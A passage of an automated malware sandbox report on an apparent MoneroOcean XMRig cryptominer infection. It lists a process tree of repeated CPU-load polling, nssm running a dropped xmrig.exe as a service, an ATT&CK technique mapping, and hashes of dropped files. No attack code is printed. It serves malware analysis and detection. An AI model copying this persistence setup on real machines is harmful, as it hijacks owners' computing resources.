- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4244
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4204
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2284
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2732
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4712
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4548
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1812
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4992
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4288
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3964
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3156
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2964

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:1936
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c7f50e3db8edd0aa37527412c086ac89

SHA1
d77eeacd2fa24f48464dabe7d1dad2c86350b719

SHA256
3f2b049f159f2320619b4d180519dcb700b4ed55454718a2b498ef7ffd33d48f

SHA512
8389434420ca3904887e6e895d2ad41f31a78a4c54b769bef92569ed7fcdf8b623986ba8649dacbdb4a6e3bf295d6104bb06390b133f85a78019fa10dd8f996e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
02ccf2d40f26a62d39f3cd85ddcd6c4e

SHA1
09e3d586dca7a048887b6221426a8a538d942f06

SHA256
aa7eea04c49a143c793c777fa7c44a0e4caefe66e086f257a089156b00d8bb0a

SHA512
1bc5d2ce806082473922eb1d8093bdfe19b4ef90eca4e8e889f22152c86a4152ca57060e5328af8a5be34a6e4e945922811620ce694a1f1a6abb8fe8ffce6497

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
47444de676671ad3a3f4a5b7ac9efb01

SHA1
9d5b48b06870be9a2faff145e4824a06a1d07aca

SHA256
6b7e9ae63ac1bb965c8903cba43b9b47fcbc6548712398566f1f8e6c39721a3e

SHA512
49075c2b45f93de097d3a8e15e3cfcdccc4ae8f13ec80bb5ad8e2567987cb3cd1c96556b5ae078c3f1eeec5d4255c45f7dc21b16ced312dfe8c54a63f6ace0ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
238f30a58af061ee71d7e2135456014d

SHA1
794784ce46d4a256c56839156d1875445aab34f1

SHA256
9785ac1ba4779304ea2c1c831f64e78e7eebdad26565b1125520ba892b53015e

SHA512
5403f3b0f0579172cff8ba763c0d37dc4f02fd3ee5e381e6d867f3bfa23393a72a90f2fc61771f280b97b173a307dbfcf42b58ec11845061bd1fbc1b9239ade3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
37832d99145658846b36172a2ab1797a

SHA1
be57aa1443dac9c599a0d54fd6818275ff2803c5

SHA256
bb33c2c8f8a83b379860fae4382d41466250c5b1196f1aa336a3278d657987f5

SHA512
f0a24ffe8d61a0e1630d056b8a0a2bbe9e62903f62a7c5d7ff7b1c7c0d8224a6cb45da4b6ce70dec7e1553542e88bd73f31969c22cd846ac5ab3838e456cb4ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
01d2533a932762a589e8d09b908fd797

SHA1
e61b67530ccccbe97b2a2dfd00709c86fb576a6e

SHA256
2e0f5463d387b464059efad487c1e2c34678e956959b7dc53e905afc5967d248

SHA512
ec5555305f509315f1ce10725b0d6c76f726726362b2069a6fc25984bf2b2198e9ed58907da3fd8450334db0edd47e01a33583f995160a37393532124d20519d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b47bb90541e0a1e440b77cf53ffd437e

SHA1
722e92f6ad5200eced64d0c39bc51797a8ee4c9a

SHA256
b8232547d5da602ffa0352ecc8090e18958f7e4e1c97f31e1b022f49cd680e20

SHA512
f3b84d6ea6ff260bf408e630e5b7c0ea74180582d2b71088403d4689b5b2386a8d152294e756cf67d58b47136088f2f98c11f5d5196a439b9aff30658c92c96e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ae79121d639a83204ecbd14fb9da70f2

SHA1
daa00b4b1a48fc62ea4b198704b24532aa7c5fa8

SHA256
f3c80b966a6a48f988a6a1e91cf604a9f936dd869360fb05460cfb3e68e59344

SHA512
459af9cc6758ef7ca9fdb5b66e7a82e761f8cfc53af129df67a57e78604db82d792fed81ebaf82d35859535ca911a6fb5b53e40da3279924149232875e6e1e9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ca1ec0a2c88715a2f81615de35a358b6

SHA1
04158abad3d75aaa5815deddcd91eb7c0b5c80e0

SHA256
11eb9b9bfac5128fff5f6364d07885119278a406da7b915d784ec43e74ba694b

SHA512
8a7b5c683d48250f0692c1fd37e8f326439afa11cfab9f7687d35a5888f686f1938b30dd5b123108d3e4db126ef9d55b049292845ce13f999128332fcbc6ed70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
120c4fdcd91648b3b53b660b5645d51c

SHA1
5a5613ae023473dc3090d194bfc1bd32fa8348ae

SHA256
720696be63b7eaba93bfe67a34557b2ddc3960a26eab5f90fb9d37145469987a

SHA512
07ac9402bc1096ce6d3605b545d47ddd8198d56cd66085135e0b0cfecb86cb9a7730109297af4f922b6b3829a5c972a50632e99d15c778d306532d3aba89d6a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cd254cf03da5c41e913541a4e8c036dd

SHA1
6db600e8bca491bc3b8ef0234217572a0d6ebdad

SHA256
5e07fb8f23ad6eadc724272528ae1e706ca1dbb51e78be47615e6790d86b8e2f

SHA512
459d1ff4f3d9cb6c61e4a8fdbb31afccc9f1322a86f3c05ca0e988e05eb0d6b8477ca4f793b7e05e957cd491dd2d22cfe6edc69df998866476e5f0f474d3ac9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
18340b9698032b460e2237380a256638

SHA1
16f6beb2eff9b08baeaca2158eaa711539b1fbdf

SHA256
373c333cab0f7fe6e8639243f86a8c05880cabd092224ead03f7f280bafaea39

SHA512
1aff7034b95e9ab9d649bd46efe2630eafe200e0d5e7b48fda5a18e83628ab5244d253875e986133cd183a499234f74a6fafa62d71ea73aa50669a969187a1c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0svcb1f3.ea3.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp84B1.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e3b9b22db047eeacf220bc3b9c7f4eb2

SHA1
3b32a79bfde5b7860537e969a65c9ce854794efb

SHA256
5ef97aec367578d4ef6954f09f3ad4db6bb92d74dd08db7452c9e7bda32327d4

SHA512
0f9f534bcf09077b826fee22bfcdb24cdef734ab10f903687107b28b28c2e45cfa72655ae5716561a4b2aade574595a373f27df380792aa7bec3281056ab7d27

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e4499a2d2a34e1d5b10835302f797678

SHA1
1b2e59b72c3557c44ea2b7f87ea6eb364644d7ee

SHA256
8566d085121a26714a098c61ef75fbb097fd90c5ade79b39a61416fc827eaa31

SHA512
757e7b1b1fabfb196d305f38ad85a8975d4830c3d37dbcd0c0ae41ac3ffb3cc38b80c2e91d8b9c0f1520b1dca9ecb718c3cb1217a7a65d36c3e34b124f2e3498

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
98181d8f6601d0546e9ec5d4fb6a000b

SHA1
804809e227b82fe6621737cbc509db2335303a1d

SHA256
a193cf039b914367197c9cfc36607058a0b284f7125bc46530fe0134f3971b4d

SHA512
559ef1e09aab71a8b44a8873b6353015c87f6d04aee6acc76ee5ab98aa34d3e4290d749abf683ca730f59cd729a5beb0f2568ce2f40516913ebc81c3a103717d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
38244c7a2e8e6ba38f359b02eb0d85ce

SHA1
190a740ecea7ad5286df338c50146a333be09996

SHA256
a25c1ec38014e9cedacf5feccc132b00ebe8921d8bf7b6349ab180cd209d5b90

SHA512
03e0a4a93fd8303c3996986009e9d0f03d41a7cef549e04b091b6252e018a26cf3cc3db1d5ccd3eb83a847df12e22e98402df4aa00990e9c3c5ba8725684068b

Download Submit
C:\Users\Admin\moneroocean\config_background.json

Filesize
2KB

MD5
678563164017fff259694b5ab1e7bea5

SHA1
00c1371af46753986978f4159c28267ab171c9f6

SHA256
403d052236b86141e7b76d52f7f2a8fd08fabf8bfa850150b0b3db93ffd90c9a

SHA512
ea9da75a8559b30261bf7a0f2ebb21fb691b62bdc9670a3f0afc6ddf0f0d85b08c2b0aaa3b3a7c6b63017f2b02649bca75b86a1ae263a467d4de1bb95e46379c

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
